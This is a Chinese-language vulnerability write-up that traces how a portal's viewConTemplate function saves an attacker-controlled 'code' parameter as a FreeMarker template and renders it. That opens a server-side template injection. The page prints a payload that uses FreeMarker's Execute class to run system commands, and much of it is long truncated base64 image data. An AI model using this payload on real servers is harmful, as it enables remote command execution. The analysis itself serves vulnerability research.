<p><a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182000-5f9626b0-87ba-1.png title><img src=data:image/png;base64,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
通过上图所示可以发现<strong>viewConTemplate</strong>函数对该请求进行处理首先通过if条件语句判断临时模板目录是否存在如果不存在则新建目录以uuid命名以ftl后缀为文件</p>
<div class=highlight><pre><span></span><span class=k>try</span> <span class=o>{</span>
<span class=n>String</span> <span class=n>sameName</span> <span class=o>=</span> <span class=k>this</span><span class=o>.</span><span class=na>uuid</span> <span class=o>+</span> <span class=s>".ftl"</span><span class=o>;</span>
<span class=n>File</span> <span class=n>file</span> <span class=o>=</span> <span class=k>new</span> <span class=n>File</span><span class=o>(</span><span class=n>PortalTemplateUtil</span><span class=o>.</span><span class=na>TEMPLATE_TEMP_DIR</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(!</span><span class=n>file</span><span class=o>.</span><span class=na>exists</span><span class=o>())</span> <span class=o>{</span><span class=n>file</span><span class=o>.</span><span class=na>mkdirs</span><span class=o>();}</span>
<span class=n>out</span> <span class=o>=</span> <span class=k>new</span> <span class=n>FileOutputStream</span><span class=o>(</span><span class=n>PortalTemplateUtil</span><span class=o>.</span><span class=na>TEMPLATE_TEMP_DIR</span> <span class=o>+</span> <span class=n>File</span><span class=o>.</span><span class=na>separator</span> <span class=o>+</span> <span class=n>sameName</span><span class=o>);</span>
</pre></div>
<p>然后通过get请求传入code参数并对code参数中传入的敏感字符进行编码替换</p>
<div class=highlight><pre><span></span><span class=n>out</span> <span class=o>=</span> <span class=k>new</span> <span class=n>FileOutputStream</span><span class=o>(</span><span class=n>PortalTemplateUtil</span><span class=o>.</span><span class=na>TEMPLATE_TEMP_DIR</span> <span class=o>+</span> <span class=n>File</span><span class=o>.</span><span class=na>separator</span> <span class=o>+</span> <span class=n>sameName</span><span class=o>);</span>
<span class=n>String</span> <span class=n>code</span> <span class=o>=</span> <span class=k>this</span><span class=o>.</span><span class=na>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"code"</span><span class=o>);</span>
<span class=n>code</span> <span class=o>=</span> <span class=n>URLDecoder</span><span class=o>.</span><span class=na>decode</span><span class=o>(</span><span class=n>code</span><span class=o>,</span> <span class=s>"UTF-8"</span><span class=o>);</span>
<span class=n>code</span> <span class=o>=</span> <span class=n>code</span><span class=o>.</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"&amp;lt;"</span><span class=o>,</span> <span class=s>"&lt;"</span><span class=o>).</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"&amp;quot;"</span><span class=o>,</span> <span class=s>"\""</span><span class=o>).</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"&amp;#39;"</span><span class=o>,</span> <span class=s>"'"</span><span class=o>).</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"&amp;gt;"</span><span class=o>,</span> <span class=s>"&gt;"</span><span class=o>).</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"&amp;nbsp;"</span><span class=o>,</span> <span class=s>" "</span><span class=o>).</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"&lt;br /&gt;"</span><span class=o>,</span> <span class=s>""</span><span class=o>).</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"&lt;p&gt;"</span><span class=o>,</span> <span class=s>""</span><span class=o>).</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"&lt;/p&gt;"</span><span class=o>,</span> <span class=s>""</span><span class=o>).</span><span class=na>replaceAll</span><span class=o>(</span><span class=s>"&amp;amp;"</span><span class=o>,</span> <span class=s>"&amp;"</span><span class=o>);</span>
</pre></div>
<p>最后通过字节流的形式写入为临时文件中</p>
<pre><code>byte[] b = code.getBytes();
out.write(b);
out.flush();</code></pre>
<p>然后通过模板渲染功能调用刚刚写入临时文件中的数据</p>
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182025-6e605562-87ba-1.png><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACi0AAARQCAYAAACbRoASAAEAAElEQVR4nOzdd3gc133v//fsYoHdRe+dAAH23qsoUqJ675aLXCPHdm7i9Nyb3FzHyc0vccpNHDvu3bIsy7ZsFasXFokixSZS7AUkeu/AouzunN8fAEkQWPQlABKf1/PoEbg7Z+acmTMzu3O++z3W8pWrDSJjMKsgH4Bjx45NbkWmsJiYGADa2tomuSaTY7q3X0RERERERERERERERORaVlBQAEBRUdEk10RERESuFlFRUTgmuxIiIiIiIiIiIiIiIiIiIiIiIiIiMj0oaFFEREREREREREREREREREREREREJoSCFkVERERERERERERERERERERERERkQihoUUREREREREREREREREREREREREQmhIIWRURERERERERERERERERERERERGRCKGhRRERERERERERERERERERERERERCaEghZFREREREREREREREREREREREREZEIoaFFEREREREREREREREREREREREREJoSCFkVERERERERERERERERERERERERkQihoUUREREREREREREREREREREREREQmhIIWRURERERERERERERERERERERERGRCKGhRRERERERERERERERERERERERERCaEghZFREREREREREREREREREREREREZEIoaFFEREREREREREREREREREREREREJoSCFkVERERERERERERERERERERERERkQihoUUREREREREREREREREREREREREQmRMRQbxoriviUVJIS4vC6XTix8Xd34GtppLa6jg7bCm8524EnKZ3U5DiiPVG4LHOpXE09HcHxN1hEREREREREREREREREREREREREJsegQYvGGUfurHySPc4+rzqI8sQS5YklISGW0jPnafSHqRxRJM0sJDchEsu6FNR4oVx8QjwV589R32HG0VwRERERERERERERERERERERERERmSwhgxaNHUFKQU/goe1vpa68gvq2DgK2k6jYVLJy0omJSiQrt43WM7UEHNY4yxk8GXnkJESC6aa5qpyq+lY6bSfu6ATSsjJJ9MSTlZ9F5/Ey2gmdqVFEREREREREREREREREREREREREpi5HyFc9KSTHOjCmk7qis1Q2+egOGGw7QEdzJedL6uk2BmdsIgmRYSjniCM1zYuFob3yLOcqm+gM2GD76WytpfhsCc0BgxWZQmqis39tRUREREREREREREREREREREREROQqEDJo0fK4iQgGCXQ00dhuD3g/0NqCzwB4cLvHXw5vLNFOwLRQX9eJ5bg8k6IVaKKuKYhlOYiOiR51I0VERERERERERERERERERERERERk8oWcHpqm8xxr6v3bMdRUzCY85SKcOAH83XQFCRlK6fd3ARE4nS6wzTDrFxEREREREREREREREREREREREZGpJvT00MOJdBNpAXTR2RWGckEbG8AVSdQgsz9HuqJ6Fg36FbAoIiIiIiIiIiIiIiIiIiIiIiIichUaU9CiJzkBr2VBRwutowhaHLRcezsdBrBiSU5xY+zLMzGaiGRSE50YY+jo8I2lyiIiIiIiIiIiIiIiIiIiIiIiIiIyyUYdtGicCWQkezAmSEtNHV0jzHo4ZDm7mfpGP5blJDqzkJmZ8bgjHOBw4Y5LI39WNrFOC0wbLU2B0VZZRERERERERERERERERERERERERKaAiNEsbIgiNS+X+AiLQGslFU1+YPigxeHKWQ5DS3kJddEFpLijiM8sJD6zt6zpvjiVdLCljsZuxjqptYiIiIiIiIiIiIiIiIiIiIiIiIhMohGH/xmiSMovJDPWielqpLy4hu4RBiyOpJxlt1J26hSl1U20dwawbRt/Vyv1VU3YLgfGdNFY00hwhJkdRURERERERERERERERERERERERGRqGVGmRYOb1JmzyIqLgGAbFeeLaQqMJGBxdOUsu4OGynM0VPaWt50kFS4gxWkRaKqiug1lWRQRERERERERERERERERERERERG5Sg0btGicMWTPnElqTAS2v5mKM+eo7zLDrnis5fpyJWaTGefEmHbqKhqUZVFERERERERERERERERERERERETkKjZ00GJkEvmFuSREObA76igpKqHZP4LAwbGW68MQQ0ZWEi7LorO2nOpOAwpaFBEREREREREREREREREREREREblqDRq06IzOIG9mBrERFv62KoqLKmi3hw8aHGu5vowN3uxckiLB+BuorGxTwKKIiIiIiIiIiIiIiIiIiIiIiIjIVS5k0KLxpFNYkIHbYeNrKKektI4uM3zQ4FjL9Wd5MshJiwJs2irLaRll0KOIiIiIiIiIiIiIiIiIiIiIiIiITD2hMy263EQ5ABx4EnOZlzRj0BX4Ko5xuqZrfOX6MLaL1Jw0vJaF3V5DeYMfUNCiiIiIiIiIiIiIiIiIiIiIiIiIyNVu0OmhASxrbMGCYy0H4ErOJT3GgTFd1FdU06WARREREREREREREREREREREREREZFrQsigRaulmA8OFY96ZWMt11egsYijjeNahYiIiIiIiIiIiIiIiIiIiIiIiIhMQY7JroCIiIiIiIiIiIiIiIiIiIiIiIiITA8KWhQRERERERERERERERERERERERGRCaGgRRERERERERERERERERERERERERGZEApaFBEREREREREREREREREREREREZEJoaBFEREREREREREREREREREREREREZkQCloUERERERERERERERERERERERERkQmhoEURERERERERERERERERERERERERmRAKWhQRERERERERERERERERERERERGRCaGgRRERERERERERERERERERERERERGZEApaFBEREREREREREREREREREREREZEJoaBFEREREREREREREREREREREREREZkQEZYJTnYd5CoXFRU12VWY8qb7Ppru7RcRme4aE+6f7CqIiIiIiIiIyDASm34z2VUQEZGrmMYDRUREZDSUaVFEREREREREREREREREREREREREJoSCFkVERERERERERERERERERERERERkQihoUUREREREREREREREREREREREREQmhIIWRURERERERERERERERERERERERGRCKGhRRERERERERERERERERERERERERCaEghZFREREREREREREREREREREREREZEIoaFFEREREREREREREREREREREREREJoSCFkVERERERERERGRUbGOIzkjnltuW8oUbEkMvQwoPfmIJ969NJSNygisocg0byfkn05uuvyIiIiIiIjLVRUx2BUREREREREREROTqYUfFsuWWhdw4x4vbYdF5pCz0gpaTuNQU5qalsmp1Cwe3H+M3h9sIWtbEVljkGjLi80+mN11/RUREREREZIpT0KKIiIiIiMh0k5DBxx6cw7wEJ1115Tzzy5Mc9WkAc8Jo/4vI1Sw+jY89spAlCQ5MsJvSY2W8935L6GXtRna8WUxgSTbzU2JZeetqZmQe4Tuv1NKmwBmR0RvN+SfTm66/IiIiIiIiMsUpaFFEZIIYk8nmP/lr1qeO7sFg+cv/hyd2NlyhWk0cY5Zw95cfZ6FrYPuNKWH7v32FPU0T+9DUzPs4f/qx1bg4y+v/339w4CoLFrja6z8a6j/Xhrwt6/n8au+Ilg2eOszfPFt7hWskozHnluv49NIoTMVp/umJYlqu0oEuZ2wC69bksDQ/gbQ4FxEmSFtzK8VnK9j2XhWVnVdHu2wrkvmrCtmyKJH0BDfeiEv1Nr4yvvv1ExQNcYyS5uawKMkFQERaLqsLTnP0iLni9b4W2IXz+Yf7M4mkkee+foB3x9BntP8nl20crHt4Cw/MtOg6dogvvVALQ5wvdt4c/u7hHLyjuO4Zu5Zf/uchDgSvjmvKUKKWLOXLt6aEfM8+d4y//WXFhGZtGu3xG/f2p
通过调用FreemarkerConfiguration类中的getTemplateTemp()静态方法取出临时文件数据</p>
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182038-75bf4746-87ba-1.png><img src="data:image/png;base64,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
读取临时文件内容并渲染成frremaker模板因为我们的code参数可控从而造成模板注入漏洞我们可以构造如下payload</p>
<pre><code>code=${"freemarker.template.utility.Execute"?new()("chdir")}</code></pre>
<p>上述payload我们使用的freemaker自带的Execute类中自带的命令执行函数,如下图所示,具体可以参考<a href=https://github.com/apache/freemarker target=_blank>github</a></p>
<p><a id=img5 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182049-7c68ccb6-87ba-1.png title><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADE8AAAYYCAYAAADSdQc0AAEAAElEQVR4nOzdd3xT1f/H8VeTNt2DUihL9hBEBBEF2Qg4EBQRHKjIzy3KV3Hgxq04UFHcCxEHQ1yAMmQPQYbI3rNQumfapEl/f6RNV7rTppT38/HgQXJz77mfO89Ncz7neN015MZspICOoa2J9A8HwMs5NWc3eRXeXYXe5/u8wLJeBef1clVe3gKFys4u+JFXdr54XKwrf7leOS/zL1Ns7MW9zXYdnqsyCi3sepl8219GXrjar3mMBnu5ysNoh5C08i1Tk/kHgLevp6MQEREREREREREREREREREREREREZGaIH/T4cL/A9i9HBMKfOZVwrJeBaeVWHZpZeX9n51/3SWtM39ZrsrLTofsuIKfu4qhwHrytUouMs2r0HKFY8pXtst580/LP6+raa62s1Ac+ZfPH2eJ25A/3kLrdjWv3YCX3UDpXKyzOCV+XlxL87IuT8F9WQZe2dnZSp4QERERqQG27T0CQKe2zWpEHG2aNfJoHCIiIiIiIiIiIiIiIiIiIiIiIiIl2XckCihbu7uypIaIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIicsZQ8ISIiIiIiIiIiIiIiIiIiIiIiIiIiIiIitZqSJ0REREREREREREREREREREREREREREREpFZT8oSIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiNRqSp4QEREREREREREREREREREREREREREREZFaTckTIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiJSqyl5QkREREREREREREREREREREREREREREREajUlT4iIiIiIiIiIiIiIiIiIiIiIiIiIiIiISK2m5AkREREREREREREREREREREREREREREREanVlDwhIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiK1mpInRERERERERERERERERERERERERERERESkVlPyhIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiI1GpKnhARERERERERERERERERERERERERERERkVpNyRMiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIlKrKXlCRERERERERERERERERERERERERERERERqNSVPiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIhIrabkCRERERERERERERERERERERERERERERERqdWUPCEiIiIiIiIiIiIiIiIiIiIiIiIiIiIiIrWakidERERERERERERERERERERERERERERERKRW8/Z0ACIiIiJSs3QYc6OnQxAREREREREREakVrMtXejoEERERERERERERyaGRJ0REREREREREREREREREREREREREREREpFZT8oSIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiNRqSp4QEREREREREREREREREREREREREREREZFaTckTIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiJSqyl5QkREREREREREREREREREREREREREREREajUlT4iIiIiIiIiIiIiIiIiIiIiIiIiIiIiISK3m7ekAREREROTMYV2+0tMhiIiIiIiIiIiI1Cg+/fp4OgQREREREREREREpA408ISIiIiIiIiIiIiIiIiIiIiIiIiIiIiIitZqSJ0REREREREREREREREREREREREREREREpFZT8oSIiIiIiIiIiIiIiIiIiIiIiIiIiIiIiNRqSp4QEREREREREREREREREREREREREREREZFazbsiC9lsNizWLKzWLGx2O3a73d1xVQmDwYDRYMDHxxuTjzdGo9HTIYmIiIiIiIiIiIiIiIiIiIiIiIiIiIjIGejkqdP8vWkLl1x0IQ0j63k6HClFuZInbDYb6RmZWCzWqoqnStlzEj2sWVmkm8Fk8iHAz1dJFCIiIiIiIiIiIiIiIiIiIiIiIiIiIiJSZjGx8bzx7kckp6SwYtV6nnr0QepFhHs6LCmBoawzZmZaSExOPWMTJ1yxWKwkJqeSmWnxdCgiIiIiIiIiIiIiIiIiIiIiIiIiIiIicgaIiY3n1bfeJzklBYDklBRefet9YmLjPRyZlKRMyRPmjExS081VHYvHpKabMWdkejoMERERESmRjV2rohnw4lEaPnyYug8fpuGT0fzm6bDOIrM/duz3ug8fpu7H